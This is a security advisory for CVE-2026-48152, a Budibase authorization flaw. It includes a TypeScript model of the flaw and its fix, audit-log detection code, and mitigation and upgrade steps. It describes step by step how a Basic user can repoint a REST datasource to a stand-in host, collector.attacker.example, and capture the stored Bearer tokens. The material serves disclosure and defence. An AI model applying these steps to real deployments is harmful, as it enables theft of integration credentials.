CVE-2026-48152 Overview
CVE-2026-48152 is an incorrect authorization vulnerability [CWE-863] in Budibase, an open-source low-code platform. In versions prior to 3.39.0, the single-datasource GET and PUT routes are guarded by the generic TABLE READ permission rather than by a Builder/Admin check or a datasource-specific ownership check. Because the built-in Basic app role grants the WRITE permission set, a low-privileged user can read a REST datasource, replace its config.url, and execute a saved query; the platform re-attaches the stored Authorization headers and sends the request to the attacker-controlled host. The effect is server-side disclosure of the REST authentication secrets that builders configured.
Critical Impact
A Basic Budibase user can exfiltrate REST datasource Authorization secrets to an attacker-controlled listener by altering only the config.url value.
Affected Products
- Budibase versions prior to 3.39.0
- Self-hosted Budibase deployments that use REST datasources with stored authentication
- Budibase apps that assign the built-in Basic role to end users
Discovery Timeline
- 2026-05-27 - CVE-2026-48152 published to NVD
- 2026-05-27 - Last updated in NVD database
Technical Details for CVE-2026-48152
Vulnerability Analysis
The vulnerability stems from inconsistent authorization on the single-datasource GET and PUT API routes. Both endpoints check only the generic TABLE READ permission and never verify Builder or Admin role membership. The Basic app user role maps to the WRITE permission set, which includes table read/write and query write, so a Basic user passes the check and can read and modify datasource configuration objects that should be reserved for Builders.
During datasource retrieval, Budibase returns authConfigs values with sensitive fields replaced by placeholder tokens. On update, the mergeConfigs() function inspects each incoming field and restores the previously stored secret wherever it finds a placeholder. This is what keeps secrets intact across legitimate edits, but it also means a caller who can reach the PUT route does not need to know a secret to keep it: submitting the placeholders back preserves every stored credential while all other fields, including config.url, remain freely changeable. Combined with the weak authorization on the PUT route, that is the whole defect.
Root Cause
The root cause is incorrect authorization [CWE-863]. The datasource mutation route enforces neither ownership nor a Builder-level role check. It accepts a partial datasource payload from any user holding WRITE, lets mergeConfigs() rehydrate the redacted secrets, and persists the result. The attacker therefore leaves the authentication metadata untouched while pointing config.url at an external host.
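The following is an added example, not Budibase's code: a minimal in-memory model of the GET redaction, the PUT merge, and the authorization check on the PUT route, with the pre-fix check beside the fixed one. The role names, the placeholder token, the data shapes and every function name are assumptions made for the example; it shows why a PUT that changes only config.url still ends up with the stored secret attached to the redirected request, and why requiring Builder/Admin stops it.

```typescript
// Added example (not Budibase code): a minimal model of the GET redaction / PUT merge
// flow and of the authorization check on the PUT route, before and after the fix.
// Role names, the placeholder token and all function names are assumptions.

type Role = "BASIC" | "POWER" | "BUILDER" | "ADMIN";

interface AuthConfig {
  name: string;
  type: "bearer";
  config: { [key: string]: string };
}

interface Datasource {
  _id: string;
  source: "REST";
  config: { url: string; authConfigs: AuthConfig[] };
}

// Placeholder returned in place of secret fields by GET (assumed token, not Budibase's).
const REDACTED = "--secret-value--";
const SECRET_FIELDS: { [key: string]: boolean } = { token: true, password: true };

// Permission sets per app role, as the advisory describes them: Basic already holds WRITE.
const ROLE_PERMISSIONS: { [role: string]: string[] } = {
  BASIC: ["READ", "WRITE"],
  POWER: ["READ", "WRITE"],
  BUILDER: ["READ", "WRITE"],
  ADMIN: ["READ", "WRITE"],
};

function cloneAuthConfig(ac: AuthConfig, mapValue: (key: string, value: string) => string): AuthConfig {
  const config: { [key: string]: string } = {};
  for (const key of Object.keys(ac.config)) {
    config[key] = mapValue(key, ac.config[key]);
  }
  return { name: ac.name, type: ac.type, config };
}

// GET: secret fields are replaced by the placeholder before the document leaves the server.
function redact(ds: Datasource): Datasource {
  return {
    _id: ds._id,
    source: ds.source,
    config: {
      url: ds.config.url,
      authConfigs: ds.config.authConfigs.map((ac) =>
        cloneAuthConfig(ac, (key, value) => (SECRET_FIELDS[key] ? REDACTED : value))),
    },
  };
}

// PUT: every placeholder in the incoming payload is replaced by the stored secret.
function mergeConfigs(incoming: Datasource, stored: Datasource): Datasource {
  const storedByName: { [name: string]: AuthConfig } = {};
  for (const ac of stored.config.authConfigs) storedByName[ac.name] = ac;
  return {
    _id: incoming._id,
    source: incoming.source,
    config: {
      url: incoming.config.url,
      authConfigs: incoming.config.authConfigs.map((ac) => {
        const prev = storedByName[ac.name];
        return cloneAuthConfig(ac, (key, value) =>
          value === REDACTED && prev && prev.config[key] !== undefined ? prev.config[key] : value);
      }),
    },
  };
}

// Pre-3.39.0 behaviour as described: the route only asks for a generic table permission.
function canUpdateVulnerable(role: Role): boolean {
  return ROLE_PERMISSIONS[role].indexOf("WRITE") !== -1;
}

// 3.39.0 behaviour as described: Builder or Admin only.
function canUpdateFixed(role: Role): boolean {
  return role === "BUILDER" || role === "ADMIN";
}

// A PUT that starts from the GET response and changes only config.url.
// Returns the persisted document, or null if the authorization check rejected it.
function putDatasource(role: Role, stored: Datasource, newUrl: string,
                       authorize: (r: Role) => boolean): Datasource | null {
  if (!authorize(role)) return null;
  const payload = redact(stored);
  payload.config.url = newUrl;
  return mergeConfigs(payload, stored);
}

// Where a saved relative-path query is sent after the update, and with which header:
// the base URL is concatenated with the relative path and the stored bearer token is attached.
function resolveRequest(ds: Datasource, relativePath: string): { url: string; authorization: string } {
  const base = ds.config.url.replace(/\/+$/, "");
  const path = relativePath.replace(/^\/+/, "");
  return { url: base + "/" + path, authorization: "Bearer " + ds.config.authConfigs[0].config.token };
}

// Constructed sample datasource; the token is a dummy value, not a real credential.
function sampleDatasource(): Datasource {
  return {
    _id: "datasource_rest_1",
    source: "REST",
    config: {
      url: "https://api.partner.example/v1",
      authConfigs: [{ name: "partner-api", type: "bearer", config: { token: "dummy-token-for-example" } }],
    },
  };
}
```

Calling putDatasource("BASIC", sampleDatasource(), "https://collector.attacker.example", canUpdateVulnerable) returns a document whose token field again holds the stored value, and resolveRequest on it yields https://collector.attacker.example/items with the Bearer header attached; the same call with canUpdateFixed returns null. The fix in the model is the one-line role check, not any change to mergeConfigs(): the merge is fine once only Builders and Admins can reach the route.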
Attack Vector
An authenticated Basic user issues a GET on the target REST datasource to obtain its structure and redacted authConfigs. The attacker submits a PUT that changes only config.url to a host they control, leaving the redaction placeholders unchanged so that mergeConfigs() restores the stored secrets. The user then executes an existing saved relative-path REST query. Budibase concatenates the attacker-supplied base URL with the saved relative path and applies the rehydrated stored Authorization headers, so the attacker's listener receives the configured secret in the request headers of a connection the Budibase server initiated.
No exploitation code is published here. See the GitHub Security Advisory GHSA-3gp5-q4jw-3v94 for the maintainer's technical write-up.
Detection Methods for CVE-2026-48152
Indicators of Compromise
- PUT requests to /api/datasources/:id originating from non-Builder accounts
- Datasource records whose config.url host differs from historical values or points to unfamiliar domains
- Outbound HTTP requests from Budibase backend processes to external hosts not used by legitimate integrations
- REST query executions immediately following a datasource update by a Basic user
Detection Strategies
- Audit application logs for datasource mutations performed by users without the Builder or Admin role
- Correlate datasource.update events with subsequent query.execute events from the same session
- Monitor egress traffic from the Budibase server for connections to newly observed domains; inspecting the Authorization header itself requires an egress proxy that terminates TLS, so without one, alert on the new destination alone
- Compare current datasource config.url values against a known-good baseline configuration
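The indicators and detection strategies above can be expressed as three correlation rules over the audit trail plus a baseline comparison. The block below is an added example, not Budibase tooling: the record shape, the action names datasource.update and query.execute, and the sample log lines are all constructed for the example and do not reflect Budibase's real audit log format, so the parser must be adapted to whatever your log forwarder emits.

```typescript
// Added example (not Budibase tooling): the correlation rules from the detection section,
// run over constructed audit records. The record shape and the action names are assumptions
// for this example, not Budibase's real audit log format.

interface AuditEvent {
  ts: string;          // ISO-8601 timestamp
  user: string;
  role: string;        // actor's app role, e.g. "BASIC" or "BUILDER"
  session: string;
  action: string;      // "datasource.update" or "query.execute"
  datasource: string;  // id of the datasource the event touched
  url?: string;        // config.url after the change (update events only)
}

interface Finding {
  rule: string;
  user: string;
  datasource: string;
  detail: string;
}

const PRIVILEGED_ROLES: { [role: string]: boolean } = { BUILDER: true, ADMIN: true };
const CORRELATION_WINDOW_MS = 10 * 60 * 1000;

// Host part of an absolute URL, lower-cased; a regex is used so the block needs no URL global.
function hostOf(url: string): string {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^/?#]+)/i.exec(url);
  return m ? m[1].toLowerCase() : "";
}

// One JSON object per line (NDJSON); blank lines are ignored.
function parseAuditLog(ndjson: string): AuditEvent[] {
  return ndjson.split("\n").filter((line) => line.trim() !== "").map((line) => JSON.parse(line) as AuditEvent);
}

// Rule 1: datasource.update by a role other than Builder/Admin.
// Rule 2: the new config.url host differs from the known-good baseline host.
// Rule 3: query.execute on the same datasource within the window after an update in the same session.
function detect(events: AuditEvent[], baseline: { [datasource: string]: string }): Finding[] {
  const findings: Finding[] = [];
  const sorted = events.slice().sort((a, b) => Date.parse(a.ts) - Date.parse(b.ts));
  const lastUpdateBySession: { [session: string]: AuditEvent } = {};
  for (const ev of sorted) {
    if (ev.action === "datasource.update") {
      if (!PRIVILEGED_ROLES[ev.role]) {
        findings.push({ rule: "update-by-non-builder", user: ev.user, datasource: ev.datasource,
          detail: "role " + ev.role + " modified a datasource" });
      }
      const expected = baseline[ev.datasource];
      if (ev.url !== undefined && expected !== undefined && hostOf(ev.url) !== hostOf(expected)) {
        findings.push({ rule: "url-host-drift", user: ev.user, datasource: ev.datasource,
          detail: hostOf(expected) + " -> " + hostOf(ev.url) });
      }
      lastUpdateBySession[ev.session] = ev;
    } else if (ev.action === "query.execute") {
      const upd = lastUpdateBySession[ev.session];
      if (upd && upd.datasource === ev.datasource &&
          Date.parse(ev.ts) - Date.parse(upd.ts) <= CORRELATION_WINDOW_MS) {
        const secs = (Date.parse(ev.ts) - Date.parse(upd.ts)) / 1000;
        findings.push({ rule: "update-then-execute", user: ev.user, datasource: ev.datasource,
          detail: "query executed " + secs + "s after update in same session" });
      }
    }
  }
  return findings;
}

// Baseline check of the current configuration, independent of the log: ids whose host moved.
function driftedDatasources(current: { [id: string]: string }, baseline: { [id: string]: string }): string[] {
  return Object.keys(current).filter((id) =>
    baseline[id] !== undefined && hostOf(current[id]) !== hostOf(baseline[id]));
}

// Constructed sample log: a Builder edit, then a Basic user repoints the same datasource and runs a query.
const SAMPLE_AUDIT_LOG = [
  '{"ts":"2026-05-28T10:00:00Z","user":"builder@example.com","role":"BUILDER","session":"s1","action":"datasource.update","datasource":"datasource_rest_1","url":"https://api.partner.example/v1"}',
  '{"ts":"2026-05-28T10:05:00Z","user":"basic@example.com","role":"BASIC","session":"s2","action":"datasource.update","datasource":"datasource_rest_1","url":"https://collector.attacker.example"}',
  '{"ts":"2026-05-28T10:05:30Z","user":"basic@example.com","role":"BASIC","session":"s2","action":"query.execute","datasource":"datasource_rest_1"}',
  '{"ts":"2026-05-28T11:00:00Z","user":"basic@example.com","role":"BASIC","session":"s3","action":"query.execute","datasource":"datasource_rest_1"}',
].join("\n");

const SAMPLE_BASELINE: { [id: string]: string } = { datasource_rest_1: "https://api.partner.example/v1" };

function runSample(): Finding[] {
  return detect(parseAuditLog(SAMPLE_AUDIT_LOG), SAMPLE_BASELINE);
}
```

On the constructed sample, runSample() returns three findings: the Basic user's update, the host drift from api.partner.example to collector.attacker.example, and the query executed 30 seconds later in the same session. The lone query in session s3 produces nothing, which is the point of the session and time-window constraints: query execution by a Basic user is normal, and only becomes interesting right after that user changed the datasource.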
Monitoring Recommendations
- Forward Budibase audit and HTTP logs to a centralized analytics platform such as Singularity Data Lake for OCSF-normalized correlation across identity, application, and network events
- Alert on any modification of REST datasource fields by accounts assigned the Basic role
- Track Budibase server outbound DNS resolutions and flag low-reputation destinations
How to Mitigate CVE-2026-48152
Immediate Actions Required
- Upgrade Budibase to version 3.39.0 or later on every self-hosted deployment
- Rotate every secret previously stored in REST datasource authConfigs, including API keys, bearer tokens, and Basic auth credentials
- Review user role assignments and revoke Basic role privileges from accounts that do not require app interaction
- Inspect datasource configuration history for unauthorized config.url changes made before the patch was applied; any such change means the secrets stored on that datasource must be treated as exposed, whatever the egress logs show
Patch Information
The vulnerability is fixed in Budibase 3.39.0. The patch tightens authorization on the single-datasource GET and PUT routes to require Builder/Admin permissions and adds datasource-specific resource checks. Refer to the Budibase GitHub Security Advisory for upgrade instructions and the official changelog.
Workarounds
- Restrict REST datasource creation to Builder accounts and remove unused REST datasources until upgraded
- Place the Budibase backend behind an egress proxy that allow-lists known integration endpoints
- Temporarily remove the Basic role from end users and require explicit per-app role provisioning
# Verify the installed Budibase version and upgrade via Docker (compose file path assumed)
docker compose -f /opt/budibase/docker-compose.yaml images   # image tags the running stack was started from
docker inspect budibase/budibase --format '{{index .Config.Labels "version"}}'   # prints <no value> if the image carries no version label
# Pin the 3.39.0 tag in docker-compose.yaml first; otherwise `up -d` recreates the containers from the old tag
docker pull budibase/budibase:3.39.0
docker compose -f /opt/budibase/docker-compose.yaml pull
docker compose -f /opt/budibase/docker-compose.yaml up -d
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


